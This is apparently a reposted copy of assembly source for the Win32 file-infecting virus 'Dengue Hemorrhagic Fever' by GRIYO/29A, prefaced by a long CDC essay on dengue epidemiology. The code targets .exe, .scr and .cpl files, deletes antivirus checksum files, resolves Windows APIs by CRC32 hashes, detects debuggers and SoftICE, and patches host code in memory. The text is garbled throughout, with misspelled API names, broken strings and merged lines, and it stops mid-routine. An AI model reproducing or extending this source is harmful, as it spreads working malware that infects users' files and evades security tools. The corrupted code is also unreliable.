Win32.Fever.asm

xiaoxiao2021-03-05  26

; ================================================== ===========================

;

Dengue Hemorrhagic Fever

;

; BiOcode by GRIYO / 29A

Griyo@bi0.net

;

; ================================================== ===========================

;

About the Biomodel

; ------------------

;

Dengue Hemorrhagic Fever: The Emergence of A Global Health Problem

;

Dengue and Dengue Hemorrhagic Fever (DHF) Are Caused by One of Four

Closely Related, But Antigenical Distinct, Virus Serotypes (DEN-1, DEN-2,

DEN-3, AND DEN-4), of the genus flavivirus. Infection with one of these

; Serotypes Does Not Provide Cross-Protective Immunity, SO PERSONS LIVING INT

A dengue-endemic area can have four dengue infections during their

Lifetimes. dengue is primarily an urban disease of the Tropics, and the THE TROPICS, AND THE

Viruses That Cause IT Are Maintained in a Cycle That Involves Humans and

AEDES AEGYPTI, A DOMESTIC, DAY-Biting Mosquito That Prefers To Feed ON

Humans. Infection with a dengue Virus Serotype Can Produce a Spectrum of

Clinical Illness, Ranging from a nonspecific viRal Syndrome To Severe and

Fatal Hemorrhagic Disease. Important Risk Factors for DHF Include The; Strain and Serotype of The Virus Involved, AS Well As The Age, Immune

status, and getetic predisposition of the pattern.

;

The first reported epidemics of dengue fever occurred in 1779-1780

; In Asia, Africa, And North America; The Near Simultaneous Occurrence of

Outbreaks On Three Continents INDICES THAT THESE VIRUS AND t

; Mosquito Vector Have Had A WorldWide Distribution in THE Tropics for more

Than 200 Years. During Most of this Time, Dengue Fever Was Considered A

Benign, Nonfatal Disease of Visitors to the Tropics. Generally, There Were

Long Intervals (10-40 Years) Between Major Epidemics, Mainly Because The

viruses and their mosquito Vector Could Only Be Transported Between

Population centers by Sailing Vessels.

;

; A Global Pandemic of Dengue Begun in SoutHeast Asia After World

WAR II and HAS INTENSIFIED DURING The Last 15 Years. Epidemics Caused by

Multiple Serotypes (Hyperendemicity) Are Moreflight, The Geographic

; Distribution of Dengue Viruses Has Expanded, And DHF HAS Emerge in the

Pacific Region and The Americas. In Southeast Asia, Epidemic DHF

First Appeared in 1950s, But by 1975 it Had Become a Leading Cause of

Hospitalization and Death Among Children In Many Countries. in the 1980s,

DHF Began a Second Expansion Into Asia When Sri Lanka, India, And The

Maldive Islands Had Their First Major DHF Epidemics; Pakistan First

; rengorted an epidemic of dengue fever in 1994. The Recent Epidemics IN

Sri Lanka and India Were Associated with Multiple Dengue Virus Serotypes,

But den-3 Was Predominant and Was GeneTically Distinct from Den-3 Viruses

Previously Isolated from Infected Persons in Those Countries .;

; After an absence of 35 years, Epidemic Dengue Fever Occurred in

; Both Taiwan and The People's Republic of China In The 1980s. The people

; Republic of China Had a series of epidemics caused by All Four Serotypes,

And ITS First Major Epidemic of DHF, Caused by Den-2, Was Reported ON

Hainan island in 1985. Singapore Also Had A Resurgence of Dengue / DHF

From 1990 to 1994 After a successful control program HAD Prevented

Significant Transmission for over 20 years. In Other Countries of Asia

WHERE DHF Is Endemic, The Epidemics Have Become Progressively Larger in The

Last 15 Years.

;

; In the Pacific, Dengue Viruses Were Reintroduced in The Early 1970s

After an absence of more Than 25 years. Epidemic Activity Caused by all all

Four Serotypes Has Intensified in Recent Years With Major Epidemics of DHF

On Several Islands.

;

; Despite Poor Surveillance for Dengue in Africa, We know That

; Epidemic Dengue Fever Caused by All Four Serotypes Has Increased

; DRAMATILY SINECE 1980. MOST ACTIVITY HAS OCCURRED IN East Africa, And

Major Epidemics Were Reported for The First Time in The Seychelles (1977),

Kenya (1982, DEN-2), Mozambique (1985, DEN-3), Djibouti (1991-92, DEN-2),

Somalia (1982, 1993, DEN-2), And Saudi Arabia (1994, DEN-2) (CDC,

Unpublished Data). Epidemic DHF HAS BEEN Reported in Neither Africa Nor Thae

Middle East, But Sporadic Cases Clinically Compatible with DHF Have Been

; Reported from Mozambique, Djibouti, And Saudi Arabia (CDC, Unpublish

DATA).

;

; The Emergence of Dengue / DHF as a MAJOR PUBLIC Health PROBLEM HAS

BEEN MOST DRAMATIC IN The American Region. in An Effort to Prevent Urban

Yellow fever, Which is also transmitted by ae. aegypti, the panraft a campaign That EraDicated ae. aegypti from

Most Central and South American Countries in the 1950s and 1960s. as a

Result, Epidemic Dengue Occurred Only SPORADICLY in Some Caribbean

Islands during this period. The ae. Aegypti eraDICATION Program, Which Was

; Officially Discontinued In the United States in 1970, Gradually Eroded

Elsewhere, And this Species Began to Reinfest Countries from Which It Had

Been Eradicated. in 1995, The Geographic Distribution of AE. Aegypti WAS

Similar to ITS Distribution Before The EraDICATION Program.

;

; In 1970, ONLY DEN-2 Virus Was Present in The Americas, Although

DEN-3 May Have Had A Focal Distribution in Colombia and Puerto Rico. In

1977, DEN-1 WAS Introducesd and Caused Major Epidemics Throughout The

Region Over A 16-Year Period. DEN-4 WAS Introduces IN 1981 and Caused

Similar Widespread Epidemics. Also in 1981, A New Strain of Den-2 from

Southeast Asia Caused The First Major DHF Epidemic in The Americas (CUBA).

This Strain Has Spread Rapidly Throughout The Region and Has Caused

Outbreaks of DHF in Venezuela, Colombia, Brazil, French Guiana, Suriname,

And Puerto Rico. by 1995, 14 Countries in The American Region Had Reported

Confirmed DHF Cases, And DHF is endemic in Many of these Countries.

;

DEN-3 Virus Recently Reappeared in The Americas After An Absence of

; 16 years. This Serotype Was First Detected in Association with a 1994

Dengue / DHF Epidemic in Nicaragua. Almost Simultaneously, Den-3 WAS

Confirmed in Panama and, in Early 1995, In Costa Rica (CDC, Unpublished

; DATA). in nicaragua, considerable number number of dhf were associated with the

Epidemic, Which Was Apparently Caused by Den-3. in Panama and Costa Rica,

The Cases Were Classic Dengue Fever.

;

; ViRal Envelope Gene Sequence Data from The Den-3 Strains Isolated

From Panama and Nicaragua Have Shown That this New American Den-3 Virus

Strain Was LIKELY A Recent Introduction from Asia Since IT IS Genetically

Distinct from the den-3 Strain Found Previously IN The Americas, But IS

Identical to the den-3 Virus Serotype That Caused Major DHF EPIDEMICS IN

Sri Lanka and India In The 1980s (R. Lanciotti; Unpublished Data). The New

; DEN-3 strain, and the susceptibility of the population in the American

; Tropics To It, Suggests That Den-3 Will Spread Rapidly Throughout the

; Region and Likey Will Cause Major Epidemics of Dengue / DHF in the Near

FUTURE.

;

; In 1995, Dengue Is The Most Important Mosquito-Borne ViRal Disease

Affecting Humans; ITS Global Distribution is Comparable to That of Malaria,

; and an estimated 2.5 billion people area Living In area at risk for epidemic

Transmission. Each Year, Tens of Millions of Cases of Dengue Fever Occur

And, Depending on the year, up to hundreds of thousands of copy of dhf. The

Case-Fatality Rate of DHF IN MOST Countries IS About 5%: Most Fatal Cases

Are Among Children.

;

; There is a small, but significt, risk for dengue outbreaks in the

Continental United States. Two Competence Mosquito Vectors, AE. aegypti and

AEDES Albopictus, Are Present and, Under Circumstances, Each Could

Transmit Dengue Viruses. This Type of Transmission Has Been Detected TWICE

; in the last 15 years in South Texas (1980 and 1986) And Has Been Associated

WITH DENGUE Epidemics in Northern Mexico. Moreover, Numerous Viruses Are

Introduces Returly by Travelers Returning from Tropical Areas WHERE Dengue; Viruses Are Endemic. from 1977 To 1994, A Total of 2,248 Suspected Cases of

Imported Dengue Were Reported In Theneited State (CDC, Unpublished Data).

Although Some Specimens Collected WERE NOT ADEQUATE for Laboratory

Diagnosis, Preliminary Data Indicate That 481 (21%) Cases WERE Confirmed AS

Dengue (CDC, Unpublished Data). Many More Cases Probably Go Unreported EACH

Year Because Surveillance In The United States IS Passive and Relies ON

Physicians to Recognize the Disease, Inquire About The Patient's Travel

History, Obtain Proper Diagnostic Samples, And Report The Case. Thase Data

; underscore the fact this southern texas and the southeastern sets,

WHERE AE. AEGYPTI IS FOUND, Are At Risk for Dengue Transmission and

Sporadic Outbreaks.

;

; The Reasons for this Dramatic Global Emergence of Dengue / DHF As A

Major Public Health Problem Are Complex and Not Well Understood. However,

Several Important Factors Can Be Identified. First, Effective Mosquito

Control Is Virtually Nonexistent in Most Dengue-Endemic Countries.

Considerable Emphasis for the Past 20 Years Has Been Placed On

Ultra-low-volume INSECCIDE SPRAYS for Adult Mosquito Control, A

Relatively INEffective Approach for Controlling AE. Aegypti. SECOND, MAJOR

; Global Demographic Changes Have Occurred, The Most Important Of Which Have

BEEN UNCONTROLLED URBANIZATION AND CONCURRENT POPULATION GROWTH. THESE

Demographic Changes Have Resulted In Substandard Housing And INADequate

; Water, SEWER, AND WASTE Management Systems, All of Which Increase

AE. Aegypti Population Densities and Facilitate Transmission of Facilitate

AE. Aegypti-Borne Disease. Third, IncreaSed Travel by AirPlane Province; The Ideal Mechanism for Transporting Dengue Viruses Between Population

Centers of the Tropics, Resulting In a constant Exchange of Dengue Viruses, IN A CONSTANT Exchange

And Other Pathogens. Lastly, In Most Countries The Public Health

Infrastructure HAS DETERIORATED. LIMITED FINANCIAL AND HUMAN RESOURES AND

Competing priorities have resulted in a "Crisis Mentality" with EMPHASIS

On Implementing So-Called Emergency Control Methods in Response To

; Epidemics Rather Than Prevent Epidemic, PREVENT EPIDEMIC

Transmission. this approach has been particularly detrimental to dengue

Control Because, In Most Countries, Surveillance Is Very INADEQUATE; THE

System to Detect Increaged Transmission Normally Relies on Reports by Local

Physicians who offten do not consider dengue in their diagnose. As a result,

An Epidemic Has Offen Reached or Passed The Peak of Transmission Before IT

IS determcted.

;

No Dengue Vaccine is Available. Recently, However, Attenuated

Candidate Vaccine Viruses Have Been Developed in Thailand. Thase Vaccines

Area Safe and Immunogenic When Given in Various Formulation, Including A

Quadrivalent Vaccine for All Four Dengue Virus Serotypes. Unfortunately,

Efficacy Trials in Human Volunteers Have Yet to Be Initiated. Research IS

Also Being Conducted to Develop Second-Generation Rechabinant Vaccine

Viruses; The Thailand Attenuated Viruses Are Used As a Template. However,

An Effective Dengue Vaccine for Public Use Will Not Be Available for 5 To

10 Years.

;

ProSpects for Reversing The Recent Trend of Increased Epidemic

Activity and Geographic Expansion of Dengue Are Not Promising. New Dengue

Virus Strains and Serotypes Will Likely Continue To Be Introduces Into Many; Areas Where The Population Densities of AE. Aegypti Are AT High Levels. with

No New Mosquito Control Technology Available, in Recent Years Public Health

; Authorities Have Emphasesized Disease Prevention and Mosquito Control Through

Community Efforts to Reduce Larval Breeding Sources. Although this approach

Will Probably Be Effective In The Long Run, IT IS Unlikely To Impact Disease

Transmission in The Near Future. We Must, Therefore, Develop Improved,

, Proactive, Laboratory-Based Surveillance Systems That Can Provide Early

Warning of an impending dengue epidemic. At the Very Least, Surveillance

Results can alert the public to take action and physicians to diagnose and

Properly Treat Dengue / DHF Cases.

;

Duane J. GUBLER AND GARY G. CLARK

National Center for Infectious Diseases

Centers for Disease Control and Prevention

; Fort Collins, Colorado, And San Juan, Puerto Rico, USA

;

; ================================================== ===========================

.386P

Locals

Jumps

.Model flat, stdcall

Include Win32API.inc

INCLUDE USEFUL.INC

Include Mz.inc

INCLUDE PE.INC

Extrn getModuleHandlea: NEAR

EXTRN SLEEP: NEAR

Number_of_poly_layers EQU 04H; Max Number of Poly Decryptors

; ================================================== ===========================; Fake Host Used for Virus 1st generation

; ================================================== ===========================

_Text Segment DWORD USE32 PUBLIC 'CODE'

; ================================================== ===========

WE NEED THE CRC Lookup Table for the next steps

; ================================================== ===========

Host_code: xor EBP, EBP

Call make_crc_tbl

; ================================================== ===========; save the crc32 of 'kernel32.dll' Inside Virus Body

; ================================================== ===========

Mov ESI, Offset G1_Szkernel32

Call get_str_crc32

Mov DWORD PTR [CRCKERNEL32], EDX

; ================================================== ===========

; Save The CRC32 of 'GetProcaddress' Inside Virus Body

; ================================================== ===========

Mov ESI, Offset G1_SZGETPROCADDR

Call get_str_crc32

MOV DWORD PTR [CRCGETPROCADDR], EDX

; ================================================== ===========; Save the crc32 of infectable file extensions

; ================================================== ===========

Mov ESI, Offset G1_SZexe

Call get_str_crc32

MOV DWORD PTR [CRC32_SZEXE], EDX

Mov ESI, Offset G1_SZSCR

Call get_str_crc32

MOV DWORD PTR [CRC32_SZSCR], EDX

MOV ESI, Offset G1_SZCPL

Call get_str_crc32

MOV DWORD PTR [CRC32_SZCPL], EDX

; ================================================== ===========

; Save the CRC32 of some av files

; ================================================== ===========

MOV ECX, Numberofav

MOV ESI, Offset G1_AV_NAMES

MOV EDI, Offset TBLCRC32AV

Call save_crc_names

; ================================================== ===========; save the crc32 of expensiver.exe

; ================================================== ===========

Mov ESI, Offset G1_SZEXPLORER

Call get_str_crc32

MOV DWORD PTR [CRCSZEXPLORER], EDX

; ================================================== ===========

Save the crc32 of 'user32.dll'

; ================================================== ===========

Mov ESI, Offset G1_SZUSER32

Call get_str_crc32

Mov DWORD PTR [CRCSZUSER32], EDX

; ================================================== ===========; save the crc32 of 'psapi.dll'

; ================================================== ===========

Mov ESI, Offset G1_SZPSAPI

Call get_str_crc32

MOV DWORD PTR [CRCSZPSAPI], EDX

; ================================================== ===========

; Save the crc32 of 'imagehlp.dll'

; ================================================== ===========

MOV ESI, Offset G1_SzIMGHLP

Call get_str_crc32

MOV DWORD PTR [CRCSZIMGHLP], EDX

; ================================================== ===========; save the crc32 of 'sfc.dll'

; ================================================== ===========

MOV ESI, Offset G1_SZSFC

Call get_str_crc32

MOV DWORD PTR [CRCSZSFC], EDX

; ================================================== ===========

Get CRC's of Needed API's and Save Theim Inside Virus Body

; Lets Start with keNel32 API Names

; ================================================== ===========

MOV ECX, Numk32apis

Mov ESI, Offset Namesk32apis

Mov Edi, Offset CRC32K32APIS

Call save_crc_names

; ================================================== ===========; this area Some Special Handled API

; ================================================== ===========

MOV ECX, 00000001H

Mov ESI, Offset Name_IndebuggerPresent

Mov Edi, Offset CRC32_ISDEBUGPR

Call save_crc_names

; ================================================== ===========

Get Toolhelp API (Windows 9x Only)

; ================================================== ===========

MOV ECX, NumToolhelPapis

Mov ESI, Offset Namestool Helpapis

Mov Edi, Offset CRC32TOOLHELPAPIS

Call save_crc_names

; ================================================== ===========; get psapi.dll apis (Windows NT & Windows 2000 ONLY)

; ================================================== ===========

MOV ECX, Numpsapiapis

Mov ESI, Offset Namespsapiapis

Mov Edi, Offset CRC32PSAPIAPIAPIS

Call save_crc_names

; ================================================== ===========

; Get API Used to Compute Image Checksum

; ================================================== ===========

MOV ECX, NumImghlPapis

Mov ESI, Offset NamesImghlpapis

Mov Edi, Offset CRC32IMGHLPAPIS

Call save_crc_names

; ================================================== ===========; Get API Used to Check for Windows2000 System File Protection

; ================================================== ===========

MOV ECX, NUMSFCAPIS

Mov ESI, Offset NamessFCapis

Mov Edi, Offset CRC32SFCAPIS

Call save_crc_names

; ================================================== ===========

Get CRC32 of User32 API Names (ANSI Version)

; ================================================== ===========

Mov ECX, Numuser32APIS

Mov ESI, Offset NamesUser32APISW9X

Mov Edi, Offset CRC32USER32APISW9X

Call save_crc_names

; ================================================== ===========; Get CRC32 of User32 API Names (Wide Version)

; ================================================== ===========

Mov ECX, Numuser32APIS

Mov ESI, Offset NamesUser32apiswnt

Mov Edi, Offset CRC32USER32APISWNT

Call save_crc_names

; ================================================== ===========

Build the do-not-infect-file-by-name crc32 table

; ================================================== ===========

MOV ECX, Avoid_Num

MOV ESI, Offset G1_AVOID_FILES

Mov Edi, Offset Avoid_TBL

Call save_crc_names

; ================================================== ===========; Get Kernel32.dll Module Handle

; ================================================== ===========

Push Offset G1_Szkernel32

Call getModuleHandlea

OR EAX, EAX

JZ OUT_1ST_GEN

MOV EBX, EAX

XOR EBP, EBP

DB 05H DUP (90h)

Call get1st_end

DB 05H DUP (90h)

; ================================================== ===========

Let the 1st generation host Running

; ================================================== ===========

OUT_1ST_GEN: PUSH 0FFFFFFFFH

Call Sleep

JMP OUT_1ST_GEN; Never Executed, But I DONT WANT to Remove IT

Anyway, this Wont Take Part of the Main

virus body ...

; ================================================== ===========; Ready to Jump Into Main Virus Body !!!!

; ================================================== ===========

Get1st_end: Push EAX; Space for EBX

Push Eax; Space for ESI

Push Eax; Space for EDI

Push EAX; Space for EBP

XOR EBP, EBP

JMP Entry_1st_gen

; ================================================== ===========

Routine That Converts API Names in CRC32 VALUES

; ================================================== ===========

Save_crc_names: CLD

GET_G1_CRC: PUSH ECX

Lodsd

PUSH ESI

Mov ESI, EAX

Call get_str_crc32

MOV EAX, EDX

Stosd

POP ESI

POP ECX

Loop get_g1_crc

RET

_Text Ends

; ================================================== ===========================; Here Comes The Rest of the Sections in Virus 1st generation

; ================================================== ===========================

_Data segment dword use32 public 'data'

; ================================================== ===========

Used to locate kernel32 base address on 1st generation

; ================================================== ===========

G1_SZKERNEL32 DB 'KERNEL32.DLL', 00H

G1_SZGETPROCADDR DB 'GETPROCADDRESS', 00H

; ================================================== ===========; used to check if file extension is infectable

; ================================================== ===========

G1_szexe db '.exe', 00H

G1_SZSCR DB '.SCR', 00H

G1_szcpl db '.cpl', 00H

; ================================================== ===========

; This Virus Use CRC32 INSTEAD OF DLL NAMES !!!!

;

; LoadLibrary Requires The DLL Name As Parameter ... but

WE CAN FIND The DLL Name by Browsing System32 Directory

For A File Whose CRC32 Matches a Given ONE

; ================================================== ===========

G1_SZEXPLORER DB 'Explorer.exe', 00H

G1_szuser32 db 'user32.dll', 00h

G1_SZPSAPI DB 'Psapi.dll', 00H

G1_szimghlp db 'imagehlp.dll', 00h

G1_szsfc db 'sfc.dll', 00h; ======================================== ====================

; Do Not Infect Files with this Character Combinations on

; their name

; ================================================== ===========

G1_AVOID_FILES EQU $

DD OFFSET G1_AVOID_00

DD Offset G1_AVOID_01

DD Offset G1_AVOID_02

DD Offset G1_AVOID_03

DD Offset G1_AVOID_04

DD Offset G1_AVOID_05

DD Offset G1_AVOID_06

DD Offset G1_AVOID_07

DD Offset G1_AVOID_08

DD Offset G1_AVOID_09

DD Offset G1_AVOID_0A

DD Offset G1_AVOID_0B

DD Offset G1_AVOID_0C

DD Offset G1_AVOID_0D

DD Offset G1_AVOID_0E

DD Offset G1_AVOID_0F

DD Offset G1_AVOID_10

DD Offset G1_AVOID_11

DD Offset G1_AVOID_12

DD Offset G1_AVOID_13

DD Offset G1_AVOID_14

DD Offset G1_AVOID_15

DD Offset G1_AVOID_16

DD Offset G1_AVOID_17

DD Offset G1_AVOID_18

Avoid_Num EQU ($ -G1_avoid_files) / 04H

G1_AVOID_00 DB 'DR', 00H

G1_avoid_01 db 'pa', 00H

G1_AVOID_02 DB 'RO', 00H

G1_AVOID_03 DB 'VI', 00H

G1_AVOID_04 DB 'AV', 00H

G1_AVOID_05 DB 'to', 00H

G1_AVOID_06 DB 'CA', 00H

G1_AVOID_07 DB 'IN', 00H

G1_AVOID_08 DB 'MS', 00H

G1_AVOID_09 DB 'SR', 00H

G1_AVOID_0A DB 'SP', 00H

G1_AVOID_0B DB 'RP', 00H

G1_avoid_0c db 'pr', 00hg1_avoid_0d db 'NO', 00H

G1_AVOID_0E DB 'CE', 00H

G1_AVOID_0F DB 'Le', 00H

G1_avoid_10 db 'mo', 00H

G1_AVOID_11 DB 'SM', 00H

G1_AVOID_12 DB 'DD', 00H

G1_AVOID_13 DB 'SO', 00H

G1_avoid_14 db 'sq', 00H

G1_avoid_15 db 'ex', 00H

G1_AVOID_16 DB 'IE', 00H

G1_AVOID_17 DB 'cm', 00H

G1_avoid_18 db 'co', 00H

; ================================================== ===========

DELETE THIS AV FILES

; ================================================== ===========

G1_AV_NAMES EQU $

DD OFFSET G1_DELETE_00

DD offset g1_delete_01

DD Offset G1_Delete_02

DD offset g1_delete_03

DD offset g1_delete_04

NUMBEROFAV EQU ($ -G1_AV_NAMES) / 04H

G1_DELETE_00 DB 'AVP.CRC', 00H

G1_DELETE_01 DB 'Anti-vir.dat', 00h

G1_DELETE_02 DB 'CHKLIST.CPS', 00H

G1_DELETE_03 DB 'Chklist.ms', 00h

G1_DELETE_04 DB 'IVP.NTZ', 00H

; ================================================== ===========

Kernel32.dll API Names;

Note That THIS TABLES AND STRINGS Are Not Included INTO THE

Virus body after 1st generation. Only CRC32 VALUES

; ================================================== ===========

Namesk32apis EQU $

DD Offset G1_CREATEFILEA

DD Offset G1_CREATEFILEMAPPINGA

DD Offset G1_CreateProcessa

DD Offset G1_CreateThread

DD Offset G1_CloseHandle

DD Offset G1_Deletefilea

DD Offset G1_EXITTHREAD

DD Offset G1_FindClose

DD Offset G1_FindFirstFilea

DD Offset G1_FindNextFilea

DD Offset G1_Freelibrary

DD Offset G1_GetComputernamea

DD Offset G1_GetcurrentProcess

DD Offset G1_GetdriveTypea

DD Offset G1_GetFileAttributesa

DD Offset G1_GetLastError

DD Offset G1_GETLOCALTIME

DD Offset G1_GetLogicalDriveStrings

DD Offset G1_GetsystemDirectorya

DD Offset G1_GetVersionex

DD Offset G1_LoadLibrarya

DD Offset G1_MapViewOffile

DD Offset G1_OpenFileMappinga

DD Offset G1_OpenProcess

DD Offset G1_ReadProcessMemory

DD Offset G1_SETENDOFFILE

DD Offset G1_setFileAttributesa

DD Offset G1_setFilePointer

DD Offset G1_setFileTime

DD Offset G1_SLEP

DD Offset G1_UnmapViewoffile

DD Offset G1_WriteProcessMemory

G1_createfilea DB 'CreateFilea', 00H

G1_createfilemappinga db 'createfilemappinga', 00H

G1_createProcessa DB 'CreateProcessa, 00h

G1_createthread DB 'CreateThread', 00H

G1_CloseHandle DB 'CloseHandle', 00H

G1_DELETEFILEA DB 'DELETEFILEA', 00H

G1_EXITTHREAD DB 'EXIXITTHREAD', 00H

G1_FindClose DB 'FindClose', 00hg1_FindFirstFilea DB 'FindfirstFilea', 00H

G1_FindNextFilea DB 'FINDNEXTFILEA', 00H

G1_FREELIBRARY DB 'FREELIBRARY', 00H

G1_getcomputernamea DB 'getcomputernamea', 00H

G1_getcurrentProcess DB 'getCurrentProcess', 00H

G1_GetdriveTypea DB 'getDriveTypea', 00H

G1_GETFileAttributesa DB 'getFileAttributesa', 00H

G1_getlasterror db 'getLastError', 00h

G1_getlocaltime db 'getLocalTime', 00H

G1_GetLogicalDriveStringsa DB 'getLogicalDriveStringsa', 00H

G1_GetsystemDirectorya DB 'getSystemDirectorya, 00H

G1_loadLibrarya DB 'loadingLibrarya', 00H

G1_getversionEx DB 'getversionExa', 00H

G1_mapviewoffile db 'mapviewoffile', 00H

G1_openfilemappinga db 'openfilemappinga', 00H

G1_OpenProcess DB 'OpenProcess', 00H

G1_ReadProcessMemory DB 'ReadProcessMemory', 00H

G1_setenDoffile db 'setndoffile', 00h

G1_setfileAttributesa DB 'setFileAttributesa', 00H

G1_setfilepointer db 'setfilepointer', 00h

G1_setfiletime db 'setfiletime', 00H

G1_Sleep DB 'Sleep', 00h

G1_unmapviewoffile db 'unmapviewoffile', 00H

G1_WriteProcessMemory DB 'WriteProcessMemory', 00h

; ================================================== ===========

Special kernel32 APIS

; ================================================== =========== Name_IndebuggerPresent DD Offset G1_IndebuggerPresent

G1_ISDebuggerPresent DB 'IsdebuggerPresent', 00H

; ================================================== ===========

; TOOLHELP APIS

; ================================================== ===========

NameStoolHelpapis Equ $

DD Offset G1_CreateToolhelp32Snapshot

DD Offset G1_Process32First

DD Offset G1_Process32Next

DD Offset G1_Module32First

DD Offset G1_Module32Next

G1_createtoolhelp32snapshot db 'CreateToolhelp32Snapshot', 00H

G1_Process32First DB 'Process32First', 00h

G1_Process32Next DB 'Process32Next', 00h

G1_Module32First DB 'Module32First', 00H

G1_Module32Next DB 'Module32Next', 00h

; ================================================== ===========; psapi.dll API Names

; ================================================== ===========

NameSPsapiapis Equ $

DD Offset G1_ENUMPROCESSMODULES

DD Offset G1_enumProcesses

DD Offset G1_GETMODULEBASENAMEA

DD Offset G1_GetModuleInformation

G1_ENUMPROCESSMODULES DB 'EnumprocessModules', 00H

G1_ENUMPROCESSS DB 'Enumprocesses', 00H

G1_getmodulebasenamea DB 'getModuleBasenamea', 00H

G1_getmoduleinformation DB 'getModuleInformation', 00H

; ================================================== ===========

; Sfc.dll API Names

; ================================================== ===========

Namessfcapis EQU $

DD Offset G1_SFCISFILEPROTECTED

G1_sfcisfileprotected db 'sfcisfileprotected', 00H

; ================================================== ===========; Imagehlp.dll API Names

; ================================================== ===========

NameSIMGHLPAPIS EQU $

DD Offset G1_ChecksumMappedFile

G1_ChecksummappedFile DB 'ChecksumMappedfile', 00H

; ================================================== ===========

User32.dll API Names (ANSI VERSION)

; ================================================== ===========

NamesUser32apisw9x EQU $

DD Offset G1W9X_DEFWINDOWPROC

G1W9X_DEFWINDOWPROC DB 'DEFWINDOWPROCA', 00H

; ================================================== ===========; user32.dll API Names (Wide Version)

; ================================================== ===========

NamesUser32apiswnt EQU $

DD Offset G1WNT_DEFWINDOWPROC

G1WNT_DEFWINDOWPROC DB 'DEFWINDOWPROCW', 00H

_Data Ends

_BSS Segment DWORD USE32 PUBLIC 'BSS'

_BSS Ends

; ================================================== ===========================

ViRal Section

;

You Have to Understand That All The Above-Mentioned Is Not Part of The Virus

THIS Means That The Text Strings and Other Information Previous To this

Point Will Be Discarded

; ================================================== ============================ virseg segment dword use32 public 'dengue'

; ================================================== ===========

Get Delta Offset in EBP

; ================================================== ===========

Viro_sys: Call Hostdelta

Hostdelta: POP EBP

Sub EBP, Offset Hostdelta

; ================================================== ===========

Create CRC32 Lookup Table ... this Virus Uses CRC32 in Lots

; Of Places Along ITS Code ... Precalculated Tables Helps to

Really Speed-Up Virus Activitie

; ================================================== =========== Call make_crc_tbl

; ================================================== ===========

Check CRC32 of Main Virus Body

;

ESI -> PTR TO BUFFER

; ECX -> Buffer Size

; ================================================== ===========

Mov ECX, SizeoftProtect

LEA ESI, DWORD PTR [EBP CRC_PROTECTED]

Call get_crc32

; ================================================== ===========

Checksum matches?

; ================================================== ===========

DB 0B8H; MOV EAX, IMM

ViRalchecksum DD 00000000HCMP Eax, EDX

JNE Critical_ERROR

CRC_PROTECTED EQU $

; ================================================== ===========

Scan System Memory Looking for kernel32.dll

; ================================================== ===========

Kernelscanning: Pushad

FK32_TRY_01: MOV EAX, 080000101H

Call IgetNTBaseAddr

JECXZ FK32_TRY_02

JMP short kernel_found

FK32_TRY_02: MOV EAX, 0C0000101H

Call IgetNTBaseAddr

JECXZ FK32_TRY_03

JMP short kernel_found

FK32_TRY_03: XOR EAX, EAX

Call IgetNTBaseAddr

Kernel_found: Jecxz critical_ERROR

Mov DWORD PTR [ESP.PUSHAD_EBX], ECX

Popad

; ================================================== ===========

This is the entry-point for 1st generation

Now EBX POINTS TO KERNEL32.DLL BASE Address

; ================================================== =========== Entry_1st_gen: Mov DWORD PTR [EBP Hkernel32], EBX

; ================================================== ===========

; Search for getProcaddress Entry-Point

; ================================================== ===========

Call getGetProcaddr

Jecxz critical_error

MOV DWORD PTR [EBP A_GETPROCADDRESS], ECX

; ================================================== ===========

Get Kernel32 API Addresses

; ================================================== ===========

MOV ECX, Numk32apis

LEA ESI, DWORD PTR [EBP CRC32K32APIS] Lea EDI, DWORD PTR [EBP EPK32APIS]

Call get_apis

Jecxz Restorehost

; ================================================== ===========

Everyhes Have to Work, Buti Something Goes Wrong this

Will Halt The Process

; ================================================== ===========

Critical_ERROR: JMP critical_ERROR

; ================================================== ===========

Restore Host Code

;

Make The Return Address Point To The Instruction Which

Made the Call

; ================================================== ===========

API_PUSH_SIZE EQU 00000004H * 00000004H

RESTOREHOST: Lea ESI, DWORD PTR [ESP API_PUSH_SIZE]

Sub DWORD PTR [ESI], 00000005H

CLD

Lodsd

LEA ESI, DWORD PTR [EBP EP_BYTES]]

PUSH ESI

Push 00000005H

Call get_org_codeorg_code db 05h DUP (90H)

GET_ORG_CODE: PUSH EAX

Call DWORD PTR [EBP A_GETCURRENTPROCESS]

Push EAX

Call DWORD PTR [EBP A_WRITEPROCESSMORY]

OR EAX, EAX

JZ Critical_ERROR

CLD

Lodsd

CMP EAX, 00000005H

JNE Critical_ERROR

; ================================================== ===========

; Try to Locate IsdebuggerPresent API

; ================================================== ===========

MOV ECX, 00000001H

LEA ESI, DWORD PTR [EBP CRC32_ISDEBUGPR]

Lea EDI, DWORD PTR [EBP A_IDEBUGERPRESENT]

Call get_apis

Jecxz detectdebug

JMP Short Si_lookup

; ================================================== ===========

Check if the current process is running in the context of a

Debugger

; ================================================== ===========

Detectdebug: Call DWORD PTR [EBP A_ISDEBUGERPRESENT] or Eax, EAX

JNZ GOBACK2HOST

; ================================================== ===========

Softice Lookup

;

Code based on the article "Win32 Anti-Debugging Tricks" by

Billy BelceBu / Ikx (Published on Xine # 4)

; ================================================== ===========

Si_lookup: MOV ESI, DWORD PTR [EBP A_CREATEFILEA]

Push ECX

Push file_attribute_readonly

Push Open_EXISTING

Push ECX

Push file_share_read

Push generic_read

Call get_szsiw9x

DB '//./sice' ,00h

Get_szsiw9x: Call ESI

CMP EAX, INVALID_HANDLE_VALUE

JNE Si_Found

Push 00000000H

Push file_attribute_readonly

Push Open_EXISTING

Push 00000000H

Push file_share_read

Push generic_read

Call get_szsiwnt

DB '//./ntice' ,00h

GET_SZSIWNT: CALL ESI

CMP EAX, INVALID_HANDLE_VALUE

JE SI_NOTFOUND

Si_Found: Push EAX

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP GOBACK2HOST

; ================================================== ===========

Get a Object name based on current hostname; ======================================== ====================

Si_NotFound: Lea EDI, DWORD PTR [EBP SIZEOFComputername]]

Push EDI

MOV Eax, 00000020H

CLD

Stosd

Push EDI

Call DWORD PTR [EBP A_GETComputerName]

OR EAX, EAX

JZ GOBACK2HOST

MOV ESI, EDI

Call get_str_crc32

Movzx ECX, Byte Ptr [EDI]

And ECX, 00000003H; Number of Characters

Inc ECX

Lea EDI, DWORD PTR [EBP SZOBJECTNAME]

LoopBuildnick: MOV Al, DL

And Al, 0FH

Add Al, 'A'; Get Character

Stosb

SHR EDX, 04H

Loop loopbuildnick

Mov Eax, 00003233H

Stosd

MOV Al, Cl

Stosb

; ================================================== ===========

ALLOCATE Shared Memory

;

